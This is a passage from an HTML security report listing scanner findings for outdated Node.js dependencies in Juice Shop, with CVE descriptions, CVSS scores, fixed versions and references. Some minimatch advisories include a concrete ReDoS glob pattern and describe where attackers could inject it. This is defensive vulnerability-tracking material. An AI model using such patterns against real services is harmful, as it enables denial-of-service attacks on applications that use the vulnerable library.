+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 347 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
jws0.2.6
+ + + + + + + +
File Path
juice-shop/node_modules/jws/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

+ + +
Description
+

node-jws: auth0/node-jws: Improper signature verification in HS256 algorithm
+Target: Node.js
+Type: node-pkg
+Fixed version: 3.2.3, 4.0.1

+

auth0/node-jws is a JSON Web Signature implementation for Node.js. In + versions 3.2.2 and earlier and version 4.0.0, auth0/node-jws has an +improper signature verification vulnerability when using the HS256 +algorithm under specific conditions. Applications are affected when they + use the jws.createVerify() function for HMAC algorithms and use +user-provided data from the JSON Web Signature protected header or +payload in HMAC secret lookup routines, which can allow attackers to +bypass signature verification. This issue has been patched in versions +3.2.3 and 4.0.1.

+ + +
Mitigation
+

3.2.3, 4.0.1

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2025-65945
+https://github.com/auth0/node-jws
+https://github.com/auth0/node-jws/commit/34c45b2c04434f925b638de6a061de9339c0ea2e
+https://github.com/auth0/node-jws/commit/4f6e73f24df42f07d632dec6431ade8eda8d11a6
+https://github.com/auth0/node-jws/releases/tag/v3.2.3
+https://github.com/auth0/node-jws/releases/tag/v4.0.1
+https://github.com/auth0/node-jws/security/advisories/GHSA-869p-cjfg-cm3x
+https://nvd.nist.gov/vuln/detail/CVE-2025-65945
+https://www.cve.org/CVERecord?id=CVE-2025-65945

+ + + + + + + +
+
+
+
+ Finding 118: CVE-2018-16487 Lodash 2.4.2 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 400 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
lodash2.4.2
+ + + + + + + +
File Path
juice-shop/node_modules/sanitize-html/node_modules/lodash/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L

+ + +
Description
+

lodash: Prototype pollution in utilities function
+Target: Node.js
+Type: node-pkg
+Fixed version: >=4.17.11

+

A prototype pollution vulnerability was found in lodash <4.17.11 +where the functions merge, mergeWith, and defaultsDeep can be tricked +into adding or modifying properties of Object.prototype.

+ + +
Mitigation
+
+

=4.17.11

+
+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2018-16487
+https://github.com/advisories/GHSA-4xc9-xhrj-v574
+https://github.com/lodash/lodash/commit/90e6199a161b6445b01454517b40ef65ebecd2ad
+https://github.com/rubysec/ruby-advisory-db/blob/master/gems/lodash-rails/CVE-2018-16487.yml
+https://hackerone.com/reports/380873
+https://nvd.nist.gov/vuln/detail/CVE-2018-16487
+https://security.netapp.com/advisory/ntap-20190919-0004
+https://security.netapp.com/advisory/ntap-20190919-0004/
+https://www.cve.org/CVERecord?id=CVE-2018-16487
+https://www.npmjs.com/advisories/782

+ + + + + + + +
+
+
+
+ Finding 119: CVE-2021-23337 Lodash 2.4.2 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 94 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
lodash2.4.2
+ + + + + + + +
File Path
juice-shop/node_modules/sanitize-html/node_modules/lodash/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

+ + +
Description
+

nodejs-lodash: command injection via template
+Target: Node.js
+Type: node-pkg
+Fixed version: 4.17.21

+

Lodash versions prior to 4.17.21 are vulnerable to Command Injection via the template function.

+ + +
Mitigation
+

4.17.21

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2021-23337
+https://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf
+https://github.com/advisories/GHSA-35jh-r3h4-6jhm
+https://github.com/lodash/lodash
+https://github.com/lodash/lodash/blob/ddfd9b11a0126db2302cb70ec9973b66baec0975/lodash.js
+https://github.com/lodash/lodash/blob/ddfd9b11a0126db2302cb70ec9973b66baec0975/lodash.js#L14851
+https://github.com/lodash/lodash/blob/ddfd9b11a0126db2302cb70ec9973b66baec0975/lodash.js%23L14851
+https://github.com/lodash/lodash/commit/3469357cff396a26c363f8c1b5a91dde28ba4b1c
+https://github.com/rubysec/ruby-advisory-db/blob/master/gems/lodash-rails/CVE-2021-23337.yml
+https://nvd.nist.gov/vuln/detail/CVE-2021-23337
+https://security.netapp.com/advisory/ntap-20210312-0006
+https://security.netapp.com/advisory/ntap-20210312-0006/
+https://snyk.io/vuln/SNYK-JAVA-ORGFUJIONWEBJARS-1074932
+https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARS-1074930
+https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWER-1074928
+https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWERGITHUBLODASH-1074931
+https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1074929
+https://snyk.io/vuln/SNYK-JS-LODASH-1040724
+https://www.cve.org/CVERecord?id=CVE-2021-23337
+https://www.oracle.com//security-alerts/cpujul2021.html
+https://www.oracle.com/security-alerts/cpujan2022.html
+https://www.oracle.com/security-alerts/cpujul2022.html
+https://www.oracle.com/security-alerts/cpuoct2021.html

+ + + + + + + +
+
+
+
+ Finding 122: CVE-2026-4800 Lodash 4.17.21 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 94 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
lodash4.17.21
+ + + + + + + +
File Path
juice-shop/node_modules/lodash/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

+ + +
Description
+

lodash: lodash: Arbitrary code execution via untrusted input in template imports
+Target: Node.js
+Type: node-pkg
+Fixed version: 4.18.0

+

Impact:

+

The fix for CVE-2021-23337 +(https://github.com/advisories/GHSA-35jh-r3h4-6jhm) added validation for + the variable option in _.template but did not apply the same validation + to options.imports key names. Both paths flow into the same Function() +constructor sink.

+

When an application passes untrusted input as options.imports key +names, an attacker can inject default-parameter expressions that execute + arbitrary code at template compilation time.

+

Additionally, _.template uses assignInWith to merge imports, which +enumerates inherited properties via for..in. If Object.prototype has +been polluted by any other vector, the polluted keys are copied into the + imports object and passed to Function().

+

Patches:

+

Users should upgrade to version 4.18.0.

+

Workarounds:

+

Do not pass untrusted input as key names in options.imports. Only use developer-controlled, static key names.

+ + +
Mitigation
+

4.18.0

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/errata/RHSA-2026:10710
+https://access.redhat.com/security/cve/CVE-2026-4800
+https://bugzilla.redhat.com/2453496
+https://cna.openjsf.org/security-advisories.html
+https://errata.almalinux.org/9/ALSA-2026-10710.html
+https://github.com/advisories/GHSA-35jh-r3h4-6jhm
+https://github.com/lodash/lodash
+https://github.com/lodash/lodash/commit/3469357cff396a26c363f8c1b5a91dde28ba4b1c
+https://github.com/lodash/lodash/security/advisories/GHSA-r5fr-rjxr-66jc
+https://linux.oracle.com/cve/CVE-2026-4800.html
+https://linux.oracle.com/errata/ELSA-2026-10713.html
+https://nvd.nist.gov/vuln/detail/CVE-2026-4800
+https://www.cve.org/CVERecord?id=CVE-2026-4800

+ + + + + + + +
+
+
+
+ Finding 125: CVE-2020-8203 lodash.set 4.3.2 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 770 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
lodash.set4.3.2
+ + + + + + + +
File Path
juice-shop/node_modules/lodash.set/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H

+ + +
Description
+

nodejs-lodash: prototype pollution in zipObjectDeep function
+Target: Node.js
+Type: node-pkg
+Fixed version:

+

Prototype pollution attack when using _.zipObjectDeep in lodash before 4.17.20.

+ + + + + + +
Impact
+

affected

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2020-8203
+https://github.com/advisories/GHSA-p6mc-m468-83gw
+https://github.com/github/advisory-database/pull/2884
+https://github.com/lodash/lodash
+https://github.com/lodash/lodash/commit/c84fe82760fb2d3e03a63379b297a1cc1a2fce12
+https://github.com/lodash/lodash/issues/4744
+https://github.com/lodash/lodash/issues/4874
+https://github.com/lodash/lodash/wiki/Changelog#v41719
+https://github.com/rubysec/ruby-advisory-db/blob/master/gems/lodash-rails/CVE-2020-8203.yml
+https://hackerone.com/reports/712065
+https://hackerone.com/reports/864701
+https://nvd.nist.gov/vuln/detail/CVE-2020-8203
+https://security.netapp.com/advisory/ntap-20200724-0006
+https://security.netapp.com/advisory/ntap-20200724-0006/
+https://web.archive.org/web/20210914001339/https://github.com/lodash/lodash/issues/4744
+https://www.cve.org/CVERecord?id=CVE-2020-8203
+https://www.npmjs.com/advisories/1523
+https://www.oracle.com//security-alerts/cpujul2021.html
+https://www.oracle.com/security-alerts/cpuApr2021.html
+https://www.oracle.com/security-alerts/cpuapr2022.html
+https://www.oracle.com/security-alerts/cpujan2022.html
+https://www.oracle.com/security-alerts/cpuoct2021.html

+ + + + + + + +
+
+
+
+ Finding 129: CVE-2026-26996 Minimatch 3.0.5 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 1333 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
minimatch3.0.5
+ + + + + + + +
File Path
juice-shop/node_modules/replace/node_modules/minimatch/package.json
+
+
+
+ + + + + +
Description
+

minimatch: minimatch: Denial of Service via specially crafted glob patterns
+Target: Node.js
+Type: node-pkg
+Fixed version: 10.2.1, 9.0.6, 8.0.5, 7.4.7, 6.2.1, 5.1.7, 4.2.4, 3.1.3

+

minimatch is a minimal matching utility for converting glob +expressions into JavaScript RegExp objects. Versions 10.2.0 and below +are vulnerable to Regular Expression Denial of Service (ReDoS) when a +glob pattern contains many consecutive * wildcards followed by a literal + character that doesn't appear in the test string. Each * compiles to a +separate [^/]*? regex group, and when the match fails, V8's regex engine + backtracks exponentially across all possible splits. The time +complexity is O(4^N) where N is the number of * characters. With N=15, a + single minimatch() call takes ~2 seconds. With N=34, it hangs +effectively forever. Any application that passes user-controlled strings + to minimatch() as the pattern argument is vulnerable to DoS. This issue + has been fixed in version 10.2.1.

+ + +
Mitigation
+

10.2.1, 9.0.6, 8.0.5, 7.4.7, 6.2.1, 5.1.7, 4.2.4, 3.1.3

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/errata/RHSA-2026:7896
+https://access.redhat.com/security/cve/CVE-2026-26996
+https://bugzilla.redhat.com/2441268
+https://bugzilla.redhat.com/2442922
+https://bugzilla.redhat.com/2448754
+https://bugzilla.redhat.com/2453151
+https://bugzilla.redhat.com/show_bug.cgi?id=2441268
+https://bugzilla.redhat.com/show_bug.cgi?id=2442922
+https://bugzilla.redhat.com/show_bug.cgi?id=2448754
+https://bugzilla.redhat.com/show_bug.cgi?id=2453151
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904
+https://errata.almalinux.org/9/ALSA-2026-7896.html
+https://errata.rockylinux.org/RLSA-2026:7896
+https://github.com/isaacs/minimatch
+https://github.com/isaacs/minimatch/commit/2e111f3a79abc00fa73110195de2c0f2351904f5
+https://github.com/isaacs/minimatch/security/advisories/GHSA-3ppc-4f35-3m26
+https://linux.oracle.com/cve/CVE-2026-26996.html
+https://linux.oracle.com/errata/ELSA-2026-8339.html
+https://nvd.nist.gov/vuln/detail/CVE-2026-26996
+https://www.cve.org/CVERecord?id=CVE-2026-26996

+ + + + + + + +
+
+
+
+ Finding 130: CVE-2026-27903 Minimatch 3.0.5 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 407 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
minimatch3.0.5
+ + + + + + + +
File Path
juice-shop/node_modules/replace/node_modules/minimatch/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

+ + +
Description
+

minimatch: minimatch: Denial of Service due to unbounded recursive backtracking via crafted glob patterns
+Target: Node.js
+Type: node-pkg
+Fixed version: 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.3

+

minimatch is a minimal matching utility for converting glob +expressions into JavaScript RegExp objects. Prior to version 10.2.3, +9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.3, matchOne() performs unbounded recursive backtracking when a glob pattern contains multiple non-adjacent ** (GLOBSTAR) segments and the input path does not match. The time complexity is O(C(n, k)) -- binomial -- where n is the number of path segments and k is the number of globstars. With k=11 and n=30, a call to the default minimatch() + API stalls for roughly 5 seconds. With k=13, it exceeds 15 seconds. No +memoization or call budget exists to bound this behavior. Any +application where an attacker can influence the glob pattern passed to minimatch() + is vulnerable. The realistic attack surface includes build tools and +task runners that accept user-supplied glob arguments (ESLint, Webpack, +Rollup config), multi-tenant systems where one tenant configures +glob-based rules that run in a shared process, admin or developer +interfaces that accept ignore-rule or filter configuration as globs, and + CI/CD pipelines that evaluate user-submitted config files containing +glob patterns. An attacker who can place a crafted pattern into any of +these paths can stall the Node.js event loop for tens of seconds per +invocation. The pattern is 56 bytes for a 5-second stall and does not +require authentication in contexts where pattern input is part of the +feature. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and +3.1.3 fix the issue.

+ + +
Mitigation
+

10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.3

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-27903
+https://github.com/isaacs/minimatch
+https://github.com/isaacs/minimatch/commit/0bf499aa45f5059b56809cc3b75ff3eafeb8d748
+https://github.com/isaacs/minimatch/security/advisories/GHSA-7r86-cg39-jmmj
+https://nvd.nist.gov/vuln/detail/CVE-2026-27903
+https://www.cve.org/CVERecord?id=CVE-2026-27903

+ + + + + + + +
+
+
+
+ Finding 131: CVE-2026-27904 Minimatch 3.0.5 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 1333 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
minimatch3.0.5
+ + + + + + + +
File Path
juice-shop/node_modules/replace/node_modules/minimatch/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

+ + +
Description
+

minimatch: Minimatch: Denial of Service via catastrophic backtracking in glob expressions
+Target: Node.js
+Type: node-pkg
+Fixed version: 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.4

+

minimatch is a minimal matching utility for converting glob +expressions into JavaScript RegExp objects. Prior to version 10.2.3, +9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4, nested *() extglobs produce regexps with nested unbounded quantifiers (e.g. (?:(?:a|b)*)*), which exhibit catastrophic backtracking in V8. With a 12-byte pattern *(*(*(a|b))) and an 18-byte non-matching input, minimatch() + stalls for over 7 seconds. Adding a single nesting level or a few input + characters pushes this to minutes. This is the most severe finding: it +is triggered by the default minimatch() API with no special options, and the minimum viable pattern is only 12 bytes. The same issue affects +() extglobs equally. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4 fix the issue.

+ + +
Mitigation
+

10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.4

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/errata/RHSA-2026:7896
+https://access.redhat.com/security/cve/CVE-2026-27904
+https://bugzilla.redhat.com/2441268
+https://bugzilla.redhat.com/2442922
+https://bugzilla.redhat.com/2448754
+https://bugzilla.redhat.com/2453151
+https://bugzilla.redhat.com/show_bug.cgi?id=2441268
+https://bugzilla.redhat.com/show_bug.cgi?id=2442922
+https://bugzilla.redhat.com/show_bug.cgi?id=2448754
+https://bugzilla.redhat.com/show_bug.cgi?id=2453151
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904
+https://errata.almalinux.org/9/ALSA-2026-7896.html
+https://errata.rockylinux.org/RLSA-2026:7896
+https://github.com/isaacs/minimatch
+https://github.com/isaacs/minimatch/commit/11d0df6165d15a955462316b26d52e5efae06fce
+https://github.com/isaacs/minimatch/security/advisories/GHSA-23c5-xmqv-rm74
+https://linux.oracle.com/cve/CVE-2026-27904.html
+https://linux.oracle.com/errata/ELSA-2026-8339.html
+https://nvd.nist.gov/vuln/detail/CVE-2026-27904
+https://www.cve.org/CVERecord?id=CVE-2026-27904

+ + + + + + + +
+
+
+
+ Finding 132: CVE-2026-26996 Minimatch 3.0.8 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 1333 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
minimatch3.0.8
+ + + + + + + +
File Path
juice-shop/node_modules/grunt/node_modules/minimatch/package.json
+
+
+
+ + + + + +
Description
+

minimatch: minimatch: Denial of Service via specially crafted glob patterns
+Target: Node.js
+Type: node-pkg
+Fixed version: 10.2.1, 9.0.6, 8.0.5, 7.4.7, 6.2.1, 5.1.7, 4.2.4, 3.1.3

+

minimatch is a minimal matching utility for converting glob +expressions into JavaScript RegExp objects. Versions 10.2.0 and below +are vulnerable to Regular Expression Denial of Service (ReDoS) when a +glob pattern contains many consecutive * wildcards followed by a literal + character that doesn't appear in the test string. Each * compiles to a +separate [^/]*? regex group, and when the match fails, V8's regex engine + backtracks exponentially across all possible splits. The time +complexity is O(4^N) where N is the number of * characters. With N=15, a + single minimatch() call takes ~2 seconds. With N=34, it hangs +effectively forever. Any application that passes user-controlled strings + to minimatch() as the pattern argument is vulnerable to DoS. This issue + has been fixed in version 10.2.1.

+ + +
Mitigation
+

10.2.1, 9.0.6, 8.0.5, 7.4.7, 6.2.1, 5.1.7, 4.2.4, 3.1.3

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/errata/RHSA-2026:7896
+https://access.redhat.com/security/cve/CVE-2026-26996
+https://bugzilla.redhat.com/2441268
+https://bugzilla.redhat.com/2442922
+https://bugzilla.redhat.com/2448754
+https://bugzilla.redhat.com/2453151
+https://bugzilla.redhat.com/show_bug.cgi?id=2441268
+https://bugzilla.redhat.com/show_bug.cgi?id=2442922
+https://bugzilla.redhat.com/show_bug.cgi?id=2448754
+https://bugzilla.redhat.com/show_bug.cgi?id=2453151
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904
+https://errata.almalinux.org/9/ALSA-2026-7896.html
+https://errata.rockylinux.org/RLSA-2026:7896
+https://github.com/isaacs/minimatch
+https://github.com/isaacs/minimatch/commit/2e111f3a79abc00fa73110195de2c0f2351904f5
+https://github.com/isaacs/minimatch/security/advisories/GHSA-3ppc-4f35-3m26
+https://linux.oracle.com/cve/CVE-2026-26996.html
+https://linux.oracle.com/errata/ELSA-2026-8339.html
+https://nvd.nist.gov/vuln/detail/CVE-2026-26996
+https://www.cve.org/CVERecord?id=CVE-2026-26996

+ + + + + + + +
+
+
+
+ Finding 133: CVE-2026-27903 Minimatch 3.0.8 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 407 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
minimatch3.0.8
+ + + + + + + +
File Path
juice-shop/node_modules/grunt/node_modules/minimatch/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

+ + +
Description
+

minimatch: minimatch: Denial of Service due to unbounded recursive backtracking via crafted glob patterns
+Target: Node.js
+Type: node-pkg
+Fixed version: 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.3

+

minimatch is a minimal matching utility for converting glob +expressions into JavaScript RegExp objects. Prior to version 10.2.3, +9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.3, matchOne() performs unbounded recursive backtracking when a glob pattern contains multiple non-adjacent ** (GLOBSTAR) segments and the input path does not match. The time complexity is O(C(n, k)) -- binomial -- where n is the number of path segments and k is the number of globstars. With k=11 and n=30, a call to the default minimatch() + API stalls for roughly 5 seconds. With k=13, it exceeds 15 seconds. No +memoization or call budget exists to bound this behavior. Any +application where an attacker can influence the glob pattern passed to minimatch() + is vulnerable. The realistic attack surface includes build tools and +task runners that accept user-supplied glob arguments (ESLint, Webpack, +Rollup config), multi-tenant systems where one tenant configures +glob-based rules that run in a shared process, admin or developer +interfaces that accept ignore-rule or filter configuration as globs, and + CI/CD pipelines that evaluate user-submitted config files containing +glob patterns. An attacker who can place a crafted pattern into any of +these paths can stall the Node.js event loop for tens of seconds per +invocation. The pattern is 56 bytes for a 5-second stall and does not +require authentication in contexts where pattern input is part of the +feature. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and +3.1.3 fix the issue.

+ + +
Mitigation
+

10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.3

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-27903
+https://github.com/isaacs/minimatch
+https://github.com/isaacs/minimatch/commit/0bf499aa45f5059b56809cc3b75ff3eafeb8d748
+https://github.com/isaacs/minimatch/security/advisories/GHSA-7r86-cg39-jmmj
+https://nvd.nist.gov/vuln/detail/CVE-2026-27903
+https://www.cve.org/CVERecord?id=CVE-2026-27903

+ + + + + + + +
+
+
+
+ Finding 134: CVE-2026-27904 Minimatch 3.0.8 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 1333 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
minimatch3.0.8
+ + + + + + + +
File Path
juice-shop/node_modules/grunt/node_modules/minimatch/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

+ + +
Description
+

minimatch: Minimatch: Denial of Service via catastrophic backtracking in glob expressions
+Target: Node.js
+Type: node-pkg
+Fixed version: 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.4

+

minimatch is a minimal matching utility for converting glob +expressions into JavaScript RegExp objects. Prior to version 10.2.3, +9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4, nested *() extglobs produce regexps with nested unbounded quantifiers (e.g. (?:(?:a|b)*)*), which exhibit catastrophic backtracking in V8. With a 12-byte pattern *(*(*(a|b))) and an 18-byte non-matching input, minimatch() + stalls for over 7 seconds. Adding a single nesting level or a few input + characters pushes this to minutes. This is the most severe finding: it +is triggered by the default minimatch() API with no special options, and the minimum viable pattern is only 12 bytes. The same issue affects +() extglobs equally. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4 fix the issue.

+ + +
Mitigation
+

10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.4

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/errata/RHSA-2026:7896
+https://access.redhat.com/security/cve/CVE-2026-27904
+https://bugzilla.redhat.com/2441268
+https://bugzilla.redhat.com/2442922
+https://bugzilla.redhat.com/2448754
+https://bugzilla.redhat.com/2453151
+https://bugzilla.redhat.com/show_bug.cgi?id=2441268
+https://bugzilla.redhat.com/show_bug.cgi?id=2442922
+https://bugzilla.redhat.com/show_bug.cgi?id=2448754
+https://bugzilla.redhat.com/show_bug.cgi?id=2453151
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904
+https://errata.almalinux.org/9/ALSA-2026-7896.html
+https://errata.rockylinux.org/RLSA-2026:7896
+https://github.com/isaacs/minimatch
+https://github.com/isaacs/minimatch/commit/11d0df6165d15a955462316b26d52e5efae06fce
+https://github.com/isaacs/minimatch/security/advisories/GHSA-23c5-xmqv-rm74
+https://linux.oracle.com/cve/CVE-2026-27904.html
+https://linux.oracle.com/errata/ELSA-2026-8339.html
+https://nvd.nist.gov/vuln/detail/CVE-2026-27904
+https://www.cve.org/CVERecord?id=CVE-2026-27904

+ + + + + + + +
+
+
+
+ Finding 135: CVE-2026-26996 Minimatch 3.1.2 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 1333 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
minimatch3.1.2
+ + + + + + + +
File Path
juice-shop/node_modules/archiver-utils/node_modules/minimatch/package.json
+
+
+
+ + + + + +
Description
+

minimatch: minimatch: Denial of Service via specially crafted glob patterns
+Target: Node.js
+Type: node-pkg
+Fixed version: 10.2.1, 9.0.6, 8.0.5, 7.4.7, 6.2.1, 5.1.7, 4.2.4, 3.1.3

+

